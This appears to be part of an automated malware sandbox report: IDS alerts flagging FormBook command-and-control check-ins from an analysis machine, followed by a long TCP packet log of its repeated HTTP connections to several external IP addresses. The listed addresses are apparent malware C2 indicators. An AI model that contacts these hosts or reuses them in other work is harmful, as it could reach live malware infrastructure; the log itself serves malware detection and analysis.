2025-01-10T16:42:15.150112+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	50002	156.253.8.115	80	TCP
2025-01-10T16:42:17.733479+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.8	50003	156.253.8.115	80	TCP
2025-01-10T16:42:23.291933+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	50004	142.93.62.161	80	TCP
2025-01-10T16:42:25.795576+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	50005	142.93.62.161	80	TCP
2025-01-10T16:42:28.376096+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	50006	142.93.62.161	80	TCP
2025-01-10T16:42:30.903404+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.8	50007	142.93.62.161	80	TCP
2025-01-10T16:42:37.077850+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	50008	104.21.96.1	80	TCP
2025-01-10T16:42:39.618013+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	50009	104.21.96.1	80	TCP
2025-01-10T16:42:42.273070+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	50010	104.21.96.1	80	TCP
2025-01-10T16:42:44.704987+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.8	50011	104.21.96.1	80	TCP
2025-01-10T16:42:50.365114+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	50012	209.74.79.42	80	TCP
2025-01-10T16:42:52.928901+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	50013	209.74.79.42	80	TCP
2025-01-10T16:42:55.473579+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	50014	209.74.79.42	80	TCP
2025-01-10T16:42:58.069647+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.8	50015	209.74.79.42	80	TCP
2025-01-10T16:43:04.411989+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	50016	192.186.57.30	80	TCP
2025-01-10T16:43:06.933517+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	50017	192.186.57.30	80	TCP
2025-01-10T16:43:09.481266+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	50018	192.186.57.30	80	TCP
2025-01-10T16:43:11.989976+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.8	50019	192.186.57.30	80	TCP
2025-01-10T16:43:17.533200+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	50020	84.32.84.32	80	TCP
2025-01-10T16:43:20.080787+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	50021	84.32.84.32	80	TCP
2025-01-10T16:43:22.745067+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	50022	84.32.84.32	80	TCP
2025-01-10T16:43:25.864795+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.8	50023	84.32.84.32	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 16:40:10.961762905 CET	49713	80	192.168.2.8	188.114.96.3
Jan 10, 2025 16:40:10.966551065 CET	80	49713	188.114.96.3	192.168.2.8
Jan 10, 2025 16:40:10.967103004 CET	49713	80	192.168.2.8	188.114.96.3
Jan 10, 2025 16:40:10.979216099 CET	49713	80	192.168.2.8	188.114.96.3
Jan 10, 2025 16:40:10.984112024 CET	80	49713	188.114.96.3	192.168.2.8
Jan 10, 2025 16:40:50.252998114 CET	80	49713	188.114.96.3	192.168.2.8
Jan 10, 2025 16:40:50.253396988 CET	80	49713	188.114.96.3	192.168.2.8
Jan 10, 2025 16:40:50.253492117 CET	49713	80	192.168.2.8	188.114.96.3
Jan 10, 2025 16:40:50.257479906 CET	49713	80	192.168.2.8	188.114.96.3
Jan 10, 2025 16:40:50.262260914 CET	80	49713	188.114.96.3	192.168.2.8
Jan 10, 2025 16:40:55.331173897 CET	49941	80	192.168.2.8	84.32.84.32
Jan 10, 2025 16:40:55.336167097 CET	80	49941	84.32.84.32	192.168.2.8
Jan 10, 2025 16:40:55.336231947 CET	49941	80	192.168.2.8	84.32.84.32
Jan 10, 2025 16:40:55.351439953 CET	49941	80	192.168.2.8	84.32.84.32
Jan 10, 2025 16:40:55.356246948 CET	80	49941	84.32.84.32	192.168.2.8
Jan 10, 2025 16:40:55.825280905 CET	80	49941	84.32.84.32	192.168.2.8
Jan 10, 2025 16:40:55.825373888 CET	49941	80	192.168.2.8	84.32.84.32
Jan 10, 2025 16:40:56.863115072 CET	49941	80	192.168.2.8	84.32.84.32
Jan 10, 2025 16:40:56.867965937 CET	80	49941	84.32.84.32	192.168.2.8
Jan 10, 2025 16:40:57.892749071 CET	49957	80	192.168.2.8	84.32.84.32
Jan 10, 2025 16:40:57.897653103 CET	80	49957	84.32.84.32	192.168.2.8
Jan 10, 2025 16:40:57.897737980 CET	49957	80	192.168.2.8	84.32.84.32
Jan 10, 2025 16:40:57.914160013 CET	49957	80	192.168.2.8	84.32.84.32
Jan 10, 2025 16:40:57.918988943 CET	80	49957	84.32.84.32	192.168.2.8
Jan 10, 2025 16:40:59.425754070 CET	49957	80	192.168.2.8	84.32.84.32
Jan 10, 2025 16:40:59.470630884 CET	80	49957	84.32.84.32	192.168.2.8
Jan 10, 2025 16:40:59.470979929 CET	49957	80	192.168.2.8	84.32.84.32
Jan 10, 2025 16:40:59.471008062 CET	80	49957	84.32.84.32	192.168.2.8
Jan 10, 2025 16:40:59.471059084 CET	49957	80	192.168.2.8	84.32.84.32
Jan 10, 2025 16:40:59.471178055 CET	80	49957	84.32.84.32	192.168.2.8
Jan 10, 2025 16:40:59.471220016 CET	49957	80	192.168.2.8	84.32.84.32
Jan 10, 2025 16:40:59.471560955 CET	80	49957	84.32.84.32	192.168.2.8
Jan 10, 2025 16:40:59.471596003 CET	49957	80	192.168.2.8	84.32.84.32
Jan 10, 2025 16:40:59.473141909 CET	80	49957	84.32.84.32	192.168.2.8
Jan 10, 2025 16:41:00.471815109 CET	49967	80	192.168.2.8	84.32.84.32
Jan 10, 2025 16:41:00.476644993 CET	80	49967	84.32.84.32	192.168.2.8
Jan 10, 2025 16:41:00.476728916 CET	49967	80	192.168.2.8	84.32.84.32
Jan 10, 2025 16:41:00.493447065 CET	49967	80	192.168.2.8	84.32.84.32
Jan 10, 2025 16:41:00.498315096 CET	80	49967	84.32.84.32	192.168.2.8
Jan 10, 2025 16:41:00.498358011 CET	80	49967	84.32.84.32	192.168.2.8
Jan 10, 2025 16:41:00.941829920 CET	80	49967	84.32.84.32	192.168.2.8
Jan 10, 2025 16:41:00.941931009 CET	49967	80	192.168.2.8	84.32.84.32
Jan 10, 2025 16:41:02.003820896 CET	49967	80	192.168.2.8	84.32.84.32
Jan 10, 2025 16:41:02.008596897 CET	80	49967	84.32.84.32	192.168.2.8
Jan 10, 2025 16:41:03.101350069 CET	49981	80	192.168.2.8	84.32.84.32
Jan 10, 2025 16:41:03.106254101 CET	80	49981	84.32.84.32	192.168.2.8
Jan 10, 2025 16:41:03.106379032 CET	49981	80	192.168.2.8	84.32.84.32
Jan 10, 2025 16:41:03.123367071 CET	49981	80	192.168.2.8	84.32.84.32
Jan 10, 2025 16:41:03.128880024 CET	80	49981	84.32.84.32	192.168.2.8
Jan 10, 2025 16:41:03.601814985 CET	80	49981	84.32.84.32	192.168.2.8
Jan 10, 2025 16:41:03.601852894 CET	80	49981	84.32.84.32	192.168.2.8
Jan 10, 2025 16:41:03.601878881 CET	80	49981	84.32.84.32	192.168.2.8
Jan 10, 2025 16:41:03.601902962 CET	80	49981	84.32.84.32	192.168.2.8
Jan 10, 2025 16:41:03.601910114 CET	49981	80	192.168.2.8	84.32.84.32
Jan 10, 2025 16:41:03.601919889 CET	80	49981	84.32.84.32	192.168.2.8
Jan 10, 2025 16:41:03.601936102 CET	80	49981	84.32.84.32	192.168.2.8
Jan 10, 2025 16:41:03.601953030 CET	80	49981	84.32.84.32	192.168.2.8
Jan 10, 2025 16:41:03.601953983 CET	49981	80	192.168.2.8	84.32.84.32
Jan 10, 2025 16:41:03.601969957 CET	80	49981	84.32.84.32	192.168.2.8
Jan 10, 2025 16:41:03.601989031 CET	80	49981	84.32.84.32	192.168.2.8
Jan 10, 2025 16:41:03.602057934 CET	49981	80	192.168.2.8	84.32.84.32
Jan 10, 2025 16:41:03.602334023 CET	80	49981	84.32.84.32	192.168.2.8
Jan 10, 2025 16:41:03.602380037 CET	49981	80	192.168.2.8	84.32.84.32
Jan 10, 2025 16:41:03.607096910 CET	49981	80	192.168.2.8	84.32.84.32
Jan 10, 2025 16:41:03.611912966 CET	80	49981	84.32.84.32	192.168.2.8
Jan 10, 2025 16:41:08.793287992 CET	49984	80	192.168.2.8	3.33.130.190
Jan 10, 2025 16:41:08.798228025 CET	80	49984	3.33.130.190	192.168.2.8
Jan 10, 2025 16:41:08.798440933 CET	49984	80	192.168.2.8	3.33.130.190
Jan 10, 2025 16:41:08.813323021 CET	49984	80	192.168.2.8	3.33.130.190
Jan 10, 2025 16:41:08.818130016 CET	80	49984	3.33.130.190	192.168.2.8
Jan 10, 2025 16:41:10.316700935 CET	49984	80	192.168.2.8	3.33.130.190
Jan 10, 2025 16:41:10.323525906 CET	80	49984	3.33.130.190	192.168.2.8
Jan 10, 2025 16:41:10.323616028 CET	49984	80	192.168.2.8	3.33.130.190
Jan 10, 2025 16:41:11.338083982 CET	49985	80	192.168.2.8	3.33.130.190
Jan 10, 2025 16:41:11.342947960 CET	80	49985	3.33.130.190	192.168.2.8
Jan 10, 2025 16:41:11.343035936 CET	49985	80	192.168.2.8	3.33.130.190
Jan 10, 2025 16:41:11.361896038 CET	49985	80	192.168.2.8	3.33.130.190
Jan 10, 2025 16:41:11.366801023 CET	80	49985	3.33.130.190	192.168.2.8
Jan 10, 2025 16:41:11.816989899 CET	80	49985	3.33.130.190	192.168.2.8
Jan 10, 2025 16:41:11.817018032 CET	80	49985	3.33.130.190	192.168.2.8
Jan 10, 2025 16:41:11.817068100 CET	49985	80	192.168.2.8	3.33.130.190
Jan 10, 2025 16:41:12.863169909 CET	49985	80	192.168.2.8	3.33.130.190
Jan 10, 2025 16:41:13.884799957 CET	49986	80	192.168.2.8	3.33.130.190
Jan 10, 2025 16:41:13.889722109 CET	80	49986	3.33.130.190	192.168.2.8
Jan 10, 2025 16:41:13.889805079 CET	49986	80	192.168.2.8	3.33.130.190
Jan 10, 2025 16:41:13.910116911 CET	49986	80	192.168.2.8	3.33.130.190
Jan 10, 2025 16:41:13.915077925 CET	80	49986	3.33.130.190	192.168.2.8
Jan 10, 2025 16:41:13.915162086 CET	80	49986	3.33.130.190	192.168.2.8
Jan 10, 2025 16:41:14.344687939 CET	80	49986	3.33.130.190	192.168.2.8
Jan 10, 2025 16:41:14.344760895 CET	80	49986	3.33.130.190	192.168.2.8
Jan 10, 2025 16:41:14.344989061 CET	49986	80	192.168.2.8	3.33.130.190
Jan 10, 2025 16:41:15.425597906 CET	49986	80	192.168.2.8	3.33.130.190
Jan 10, 2025 16:41:16.446856022 CET	49987	80	192.168.2.8	3.33.130.190
Jan 10, 2025 16:41:16.451770067 CET	80	49987	3.33.130.190	192.168.2.8
Jan 10, 2025 16:41:16.454921961 CET	49987	80	192.168.2.8	3.33.130.190
Jan 10, 2025 16:41:16.467077971 CET	49987	80	192.168.2.8	3.33.130.190
Jan 10, 2025 16:41:16.471878052 CET	80	49987	3.33.130.190	192.168.2.8
Jan 10, 2025 16:41:22.935368061 CET	80	49987	3.33.130.190	192.168.2.8
Jan 10, 2025 16:41:22.935545921 CET	80	49987	3.33.130.190	192.168.2.8
Jan 10, 2025 16:41:22.935787916 CET	49987	80	192.168.2.8	3.33.130.190
Jan 10, 2025 16:41:22.939147949 CET	49987	80	192.168.2.8	3.33.130.190
Jan 10, 2025 16:41:22.943936110 CET	80	49987	3.33.130.190	192.168.2.8
Jan 10, 2025 16:41:27.975033045 CET	49988	80	192.168.2.8	91.195.240.123
Jan 10, 2025 16:41:27.980767012 CET	80	49988	91.195.240.123	192.168.2.8
Jan 10, 2025 16:41:27.980928898 CET	49988	80	192.168.2.8	91.195.240.123
Jan 10, 2025 16:41:27.996700048 CET	49988	80	192.168.2.8	91.195.240.123
Jan 10, 2025 16:41:28.001501083 CET	80	49988	91.195.240.123	192.168.2.8
Jan 10, 2025 16:41:28.635329962 CET	80	49988	91.195.240.123	192.168.2.8
Jan 10, 2025 16:41:28.635397911 CET	80	49988	91.195.240.123	192.168.2.8
Jan 10, 2025 16:41:28.635545969 CET	49988	80	192.168.2.8	91.195.240.123
Jan 10, 2025 16:41:29.503736973 CET	49988	80	192.168.2.8	91.195.240.123
Jan 10, 2025 16:41:30.524786949 CET	49989	80	192.168.2.8	91.195.240.123
Jan 10, 2025 16:41:30.531528950 CET	80	49989	91.195.240.123	192.168.2.8
Jan 10, 2025 16:41:30.533328056 CET	49989	80	192.168.2.8	91.195.240.123
Jan 10, 2025 16:41:30.548933029 CET	49989	80	192.168.2.8	91.195.240.123
Jan 10, 2025 16:41:30.553874016 CET	80	49989	91.195.240.123	192.168.2.8
Jan 10, 2025 16:41:31.180505037 CET	80	49989	91.195.240.123	192.168.2.8
Jan 10, 2025 16:41:31.181668043 CET	80	49989	91.195.240.123	192.168.2.8
Jan 10, 2025 16:41:31.181715012 CET	49989	80	192.168.2.8	91.195.240.123
Jan 10, 2025 16:41:32.052804947 CET	49989	80	192.168.2.8	91.195.240.123
Jan 10, 2025 16:41:33.071420908 CET	49990	80	192.168.2.8	91.195.240.123
Jan 10, 2025 16:41:33.076234102 CET	80	49990	91.195.240.123	192.168.2.8
Jan 10, 2025 16:41:33.076308012 CET	49990	80	192.168.2.8	91.195.240.123
Jan 10, 2025 16:41:33.096592903 CET	49990	80	192.168.2.8	91.195.240.123
Jan 10, 2025 16:41:33.101547003 CET	80	49990	91.195.240.123	192.168.2.8
Jan 10, 2025 16:41:33.101710081 CET	80	49990	91.195.240.123	192.168.2.8
Jan 10, 2025 16:41:33.724426031 CET	80	49990	91.195.240.123	192.168.2.8
Jan 10, 2025 16:41:33.724447966 CET	80	49990	91.195.240.123	192.168.2.8
Jan 10, 2025 16:41:33.724495888 CET	49990	80	192.168.2.8	91.195.240.123
Jan 10, 2025 16:41:34.615057945 CET	49990	80	192.168.2.8	91.195.240.123
Jan 10, 2025 16:41:35.634721041 CET	49991	80	192.168.2.8	91.195.240.123
Jan 10, 2025 16:41:35.639614105 CET	80	49991	91.195.240.123	192.168.2.8
Jan 10, 2025 16:41:35.640353918 CET	49991	80	192.168.2.8	91.195.240.123
Jan 10, 2025 16:41:35.650811911 CET	49991	80	192.168.2.8	91.195.240.123
Jan 10, 2025 16:41:35.655685902 CET	80	49991	91.195.240.123	192.168.2.8
Jan 10, 2025 16:41:36.710522890 CET	80	49991	91.195.240.123	192.168.2.8
Jan 10, 2025 16:41:36.710551023 CET	80	49991	91.195.240.123	192.168.2.8
Jan 10, 2025 16:41:36.710561991 CET	80	49991	91.195.240.123	192.168.2.8
Jan 10, 2025 16:41:36.710572958 CET	80	49991	91.195.240.123	192.168.2.8
Jan 10, 2025 16:41:36.710586071 CET	80	49991	91.195.240.123	192.168.2.8
Jan 10, 2025 16:41:36.710771084 CET	49991	80	192.168.2.8	91.195.240.123
Jan 10, 2025 16:41:36.715621948 CET	49991	80	192.168.2.8	91.195.240.123
Jan 10, 2025 16:41:36.720424891 CET	80	49991	91.195.240.123	192.168.2.8
Jan 10, 2025 16:41:41.796071053 CET	49992	80	192.168.2.8	38.181.21.54
Jan 10, 2025 16:41:41.801116943 CET	80	49992	38.181.21.54	192.168.2.8
Jan 10, 2025 16:41:41.801217079 CET	49992	80	192.168.2.8	38.181.21.54
Jan 10, 2025 16:41:41.883568048 CET	49992	80	192.168.2.8	38.181.21.54
Jan 10, 2025 16:41:41.888585091 CET	80	49992	38.181.21.54	192.168.2.8
Jan 10, 2025 16:41:42.736675978 CET	80	49992	38.181.21.54	192.168.2.8
Jan 10, 2025 16:41:42.736754894 CET	80	49992	38.181.21.54	192.168.2.8
Jan 10, 2025 16:41:42.736923933 CET	49992	80	192.168.2.8	38.181.21.54
Jan 10, 2025 16:41:43.394428015 CET	49992	80	192.168.2.8	38.181.21.54
Jan 10, 2025 16:41:44.414969921 CET	49993	80	192.168.2.8	38.181.21.54
Jan 10, 2025 16:41:44.419950962 CET	80	49993	38.181.21.54	192.168.2.8
Jan 10, 2025 16:41:44.421260118 CET	49993	80	192.168.2.8	38.181.21.54
Jan 10, 2025 16:41:44.440283060 CET	49993	80	192.168.2.8	38.181.21.54
Jan 10, 2025 16:41:44.445231915 CET	80	49993	38.181.21.54	192.168.2.8
Jan 10, 2025 16:41:45.335016966 CET	80	49993	38.181.21.54	192.168.2.8
Jan 10, 2025 16:41:45.335031986 CET	80	49993	38.181.21.54	192.168.2.8
Jan 10, 2025 16:41:45.335087061 CET	49993	80	192.168.2.8	38.181.21.54
Jan 10, 2025 16:41:45.944669962 CET	49993	80	192.168.2.8	38.181.21.54
Jan 10, 2025 16:41:46.960779905 CET	49994	80	192.168.2.8	38.181.21.54
Jan 10, 2025 16:41:46.965704918 CET	80	49994	38.181.21.54	192.168.2.8
Jan 10, 2025 16:41:46.965856075 CET	49994	80	192.168.2.8	38.181.21.54
Jan 10, 2025 16:41:46.981390953 CET	49994	80	192.168.2.8	38.181.21.54
Jan 10, 2025 16:41:46.986267090 CET	80	49994	38.181.21.54	192.168.2.8
Jan 10, 2025 16:41:46.986435890 CET	80	49994	38.181.21.54	192.168.2.8
Jan 10, 2025 16:41:48.083585024 CET	80	49994	38.181.21.54	192.168.2.8
Jan 10, 2025 16:41:48.083693981 CET	80	49994	38.181.21.54	192.168.2.8
Jan 10, 2025 16:41:48.090903997 CET	49994	80	192.168.2.8	38.181.21.54
Jan 10, 2025 16:41:48.488735914 CET	49994	80	192.168.2.8	38.181.21.54
Jan 10, 2025 16:41:49.509268045 CET	49995	80	192.168.2.8	38.181.21.54
Jan 10, 2025 16:41:49.514070988 CET	80	49995	38.181.21.54	192.168.2.8
Jan 10, 2025 16:41:49.514142036 CET	49995	80	192.168.2.8	38.181.21.54
Jan 10, 2025 16:41:49.526331902 CET	49995	80	192.168.2.8	38.181.21.54
Jan 10, 2025 16:41:49.531158924 CET	80	49995	38.181.21.54	192.168.2.8
Jan 10, 2025 16:41:50.399960041 CET	80	49995	38.181.21.54	192.168.2.8
Jan 10, 2025 16:41:50.400084019 CET	80	49995	38.181.21.54	192.168.2.8
Jan 10, 2025 16:41:50.400333881 CET	49995	80	192.168.2.8	38.181.21.54
Jan 10, 2025 16:41:50.404738903 CET	49995	80	192.168.2.8	38.181.21.54
Jan 10, 2025 16:41:50.409564018 CET	80	49995	38.181.21.54	192.168.2.8
Jan 10, 2025 16:41:55.793678999 CET	49996	80	192.168.2.8	78.141.202.204
Jan 10, 2025 16:41:55.798799992 CET	80	49996	78.141.202.204	192.168.2.8
Jan 10, 2025 16:41:55.798873901 CET	49996	80	192.168.2.8	78.141.202.204
Jan 10, 2025 16:41:55.815737963 CET	49996	80	192.168.2.8	78.141.202.204
Jan 10, 2025 16:41:55.820528030 CET	80	49996	78.141.202.204	192.168.2.8
Jan 10, 2025 16:41:56.379987955 CET	80	49996	78.141.202.204	192.168.2.8
Jan 10, 2025 16:41:56.380008936 CET	80	49996	78.141.202.204	192.168.2.8
Jan 10, 2025 16:41:56.380120039 CET	49996	80	192.168.2.8	78.141.202.204
Jan 10, 2025 16:41:57.332000017 CET	49996	80	192.168.2.8	78.141.202.204
Jan 10, 2025 16:41:58.351959944 CET	49997	80	192.168.2.8	78.141.202.204
Jan 10, 2025 16:41:58.356791973 CET	80	49997	78.141.202.204	192.168.2.8
Jan 10, 2025 16:41:58.356993914 CET	49997	80	192.168.2.8	78.141.202.204
Jan 10, 2025 16:41:58.373183012 CET	49997	80	192.168.2.8	78.141.202.204
Jan 10, 2025 16:41:58.378032923 CET	80	49997	78.141.202.204	192.168.2.8
Jan 10, 2025 16:41:58.953907967 CET	80	49997	78.141.202.204	192.168.2.8
Jan 10, 2025 16:41:58.954014063 CET	80	49997	78.141.202.204	192.168.2.8
Jan 10, 2025 16:41:58.955635071 CET	49997	80	192.168.2.8	78.141.202.204
Jan 10, 2025 16:41:59.879127026 CET	49997	80	192.168.2.8	78.141.202.204
Jan 10, 2025 16:42:00.898029089 CET	49998	80	192.168.2.8	78.141.202.204
Jan 10, 2025 16:42:00.902864933 CET	80	49998	78.141.202.204	192.168.2.8
Jan 10, 2025 16:42:00.902970076 CET	49998	80	192.168.2.8	78.141.202.204
Jan 10, 2025 16:42:00.918945074 CET	49998	80	192.168.2.8	78.141.202.204
Jan 10, 2025 16:42:00.923846960 CET	80	49998	78.141.202.204	192.168.2.8
Jan 10, 2025 16:42:00.923870087 CET	80	49998	78.141.202.204	192.168.2.8
Jan 10, 2025 16:42:01.514224052 CET	80	49998	78.141.202.204	192.168.2.8
Jan 10, 2025 16:42:01.514507055 CET	80	49998	78.141.202.204	192.168.2.8
Jan 10, 2025 16:42:01.514553070 CET	49998	80	192.168.2.8	78.141.202.204
Jan 10, 2025 16:42:02.425705910 CET	49998	80	192.168.2.8	78.141.202.204
Jan 10, 2025 16:42:03.446079969 CET	49999	80	192.168.2.8	78.141.202.204
Jan 10, 2025 16:42:03.451040983 CET	80	49999	78.141.202.204	192.168.2.8
Jan 10, 2025 16:42:03.451152086 CET	49999	80	192.168.2.8	78.141.202.204
Jan 10, 2025 16:42:03.464699030 CET	49999	80	192.168.2.8	78.141.202.204
Jan 10, 2025 16:42:03.469589949 CET	80	49999	78.141.202.204	192.168.2.8
Jan 10, 2025 16:42:04.039510965 CET	80	49999	78.141.202.204	192.168.2.8
Jan 10, 2025 16:42:04.039577007 CET	80	49999	78.141.202.204	192.168.2.8
Jan 10, 2025 16:42:04.040733099 CET	49999	80	192.168.2.8	78.141.202.204
Jan 10, 2025 16:42:04.043334961 CET	49999	80	192.168.2.8	78.141.202.204
Jan 10, 2025 16:42:04.048249960 CET	80	49999	78.141.202.204	192.168.2.8
Jan 10, 2025 16:42:09.093357086 CET	50000	80	192.168.2.8	156.253.8.115
Jan 10, 2025 16:42:09.098361015 CET	80	50000	156.253.8.115	192.168.2.8
Jan 10, 2025 16:42:09.099236012 CET	50000	80	192.168.2.8	156.253.8.115
Jan 10, 2025 16:42:09.118288040 CET	50000	80	192.168.2.8	156.253.8.115
Jan 10, 2025 16:42:09.123178005 CET	80	50000	156.253.8.115	192.168.2.8
Jan 10, 2025 16:42:10.046863079 CET	80	50000	156.253.8.115	192.168.2.8
Jan 10, 2025 16:42:10.047000885 CET	80	50000	156.253.8.115	192.168.2.8
Jan 10, 2025 16:42:10.047040939 CET	50000	80	192.168.2.8	156.253.8.115
Jan 10, 2025 16:42:10.628820896 CET	50000	80	192.168.2.8	156.253.8.115
Jan 10, 2025 16:42:11.648936987 CET	50001	80	192.168.2.8	156.253.8.115
Jan 10, 2025 16:42:11.653733015 CET	80	50001	156.253.8.115	192.168.2.8
Jan 10, 2025 16:42:11.653798103 CET	50001	80	192.168.2.8	156.253.8.115
Jan 10, 2025 16:42:11.674416065 CET	50001	80	192.168.2.8	156.253.8.115
Jan 10, 2025 16:42:11.679183006 CET	80	50001	156.253.8.115	192.168.2.8
Jan 10, 2025 16:42:12.601409912 CET	80	50001	156.253.8.115	192.168.2.8
Jan 10, 2025 16:42:12.601641893 CET	80	50001	156.253.8.115	192.168.2.8
Jan 10, 2025 16:42:12.602253914 CET	50001	80	192.168.2.8	156.253.8.115
Jan 10, 2025 16:42:13.191557884 CET	50001	80	192.168.2.8	156.253.8.115
Jan 10, 2025 16:42:14.210772991 CET	50002	80	192.168.2.8	156.253.8.115
Jan 10, 2025 16:42:14.215809107 CET	80	50002	156.253.8.115	192.168.2.8
Jan 10, 2025 16:42:14.219079971 CET	50002	80	192.168.2.8	156.253.8.115
Jan 10, 2025 16:42:14.240464926 CET	50002	80	192.168.2.8	156.253.8.115
Jan 10, 2025 16:42:14.245357990 CET	80	50002	156.253.8.115	192.168.2.8
Jan 10, 2025 16:42:14.246025085 CET	80	50002	156.253.8.115	192.168.2.8
Jan 10, 2025 16:42:15.149980068 CET	80	50002	156.253.8.115	192.168.2.8
Jan 10, 2025 16:42:15.150055885 CET	80	50002	156.253.8.115	192.168.2.8
Jan 10, 2025 16:42:15.150111914 CET	50002	80	192.168.2.8	156.253.8.115
Jan 10, 2025 16:42:15.754144907 CET	50002	80	192.168.2.8	156.253.8.115
Jan 10, 2025 16:42:16.773896933 CET	50003	80	192.168.2.8	156.253.8.115
Jan 10, 2025 16:42:16.778836966 CET	80	50003	156.253.8.115	192.168.2.8
Jan 10, 2025 16:42:16.781044006 CET	50003	80	192.168.2.8	156.253.8.115
Jan 10, 2025 16:42:16.793315887 CET	50003	80	192.168.2.8	156.253.8.115
Jan 10, 2025 16:42:16.798223019 CET	80	50003	156.253.8.115	192.168.2.8
Jan 10, 2025 16:42:17.733213902 CET	80	50003	156.253.8.115	192.168.2.8
Jan 10, 2025 16:42:17.733273029 CET	80	50003	156.253.8.115	192.168.2.8
Jan 10, 2025 16:42:17.733479023 CET	50003	80	192.168.2.8	156.253.8.115
Jan 10, 2025 16:42:17.736165047 CET	50003	80	192.168.2.8	156.253.8.115
Jan 10, 2025 16:42:17.740940094 CET	80	50003	156.253.8.115	192.168.2.8
Jan 10, 2025 16:42:22.787355900 CET	50004	80	192.168.2.8	142.93.62.161
Jan 10, 2025 16:42:22.792355061 CET	80	50004	142.93.62.161	192.168.2.8
Jan 10, 2025 16:42:22.795269966 CET	50004	80	192.168.2.8	142.93.62.161
Jan 10, 2025 16:42:22.813385010 CET	50004	80	192.168.2.8	142.93.62.161
Jan 10, 2025 16:42:22.818240881 CET	80	50004	142.93.62.161	192.168.2.8
Jan 10, 2025 16:42:23.291846991 CET	80	50004	142.93.62.161	192.168.2.8
Jan 10, 2025 16:42:23.291877031 CET	80	50004	142.93.62.161	192.168.2.8
Jan 10, 2025 16:42:23.291933060 CET	50004	80	192.168.2.8	142.93.62.161
Jan 10, 2025 16:42:24.316772938 CET	50004	80	192.168.2.8	142.93.62.161
Jan 10, 2025 16:42:25.336687088 CET	50005	80	192.168.2.8	142.93.62.161
Jan 10, 2025 16:42:25.341653109 CET	80	50005	142.93.62.161	192.168.2.8
Jan 10, 2025 16:42:25.341737986 CET	50005	80	192.168.2.8	142.93.62.161
Jan 10, 2025 16:42:25.360647917 CET	50005	80	192.168.2.8	142.93.62.161
Jan 10, 2025 16:42:25.365557909 CET	80	50005	142.93.62.161	192.168.2.8
Jan 10, 2025 16:42:25.795466900 CET	80	50005	142.93.62.161	192.168.2.8
Jan 10, 2025 16:42:25.795523882 CET	80	50005	142.93.62.161	192.168.2.8
Jan 10, 2025 16:42:25.795576096 CET	50005	80	192.168.2.8	142.93.62.161
Jan 10, 2025 16:42:26.863243103 CET	50005	80	192.168.2.8	142.93.62.161
Jan 10, 2025 16:42:27.884746075 CET	50006	80	192.168.2.8	142.93.62.161
Jan 10, 2025 16:42:27.889642000 CET	80	50006	142.93.62.161	192.168.2.8
Jan 10, 2025 16:42:27.892745972 CET	50006	80	192.168.2.8	142.93.62.161
Jan 10, 2025 16:42:27.920757055 CET	50006	80	192.168.2.8	142.93.62.161
Jan 10, 2025 16:42:27.925869942 CET	80	50006	142.93.62.161	192.168.2.8
Jan 10, 2025 16:42:27.926295996 CET	80	50006	142.93.62.161	192.168.2.8
Jan 10, 2025 16:42:28.374538898 CET	80	50006	142.93.62.161	192.168.2.8
Jan 10, 2025 16:42:28.374558926 CET	80	50006	142.93.62.161	192.168.2.8
Jan 10, 2025 16:42:28.376096010 CET	50006	80	192.168.2.8	142.93.62.161
Jan 10, 2025 16:42:29.425813913 CET	50006	80	192.168.2.8	142.93.62.161
Jan 10, 2025 16:42:30.447350025 CET	50007	80	192.168.2.8	142.93.62.161
Jan 10, 2025 16:42:30.452178001 CET	80	50007	142.93.62.161	192.168.2.8
Jan 10, 2025 16:42:30.459167957 CET	50007	80	192.168.2.8	142.93.62.161
Jan 10, 2025 16:42:30.470752954 CET	50007	80	192.168.2.8	142.93.62.161
Jan 10, 2025 16:42:30.475632906 CET	80	50007	142.93.62.161	192.168.2.8
Jan 10, 2025 16:42:30.903091908 CET	80	50007	142.93.62.161	192.168.2.8
Jan 10, 2025 16:42:30.903109074 CET	80	50007	142.93.62.161	192.168.2.8
Jan 10, 2025 16:42:30.903218985 CET	80	50007	142.93.62.161	192.168.2.8
Jan 10, 2025 16:42:30.903403997 CET	50007	80	192.168.2.8	142.93.62.161
Jan 10, 2025 16:42:30.909075022 CET	50007	80	192.168.2.8	142.93.62.161
Jan 10, 2025 16:42:30.913870096 CET	80	50007	142.93.62.161	192.168.2.8
Jan 10, 2025 16:42:36.449474096 CET	50008	80	192.168.2.8	104.21.96.1
Jan 10, 2025 16:42:36.454422951 CET	80	50008	104.21.96.1	192.168.2.8
Jan 10, 2025 16:42:36.454605103 CET	50008	80	192.168.2.8	104.21.96.1
Jan 10, 2025 16:42:36.469980001 CET	50008	80	192.168.2.8	104.21.96.1
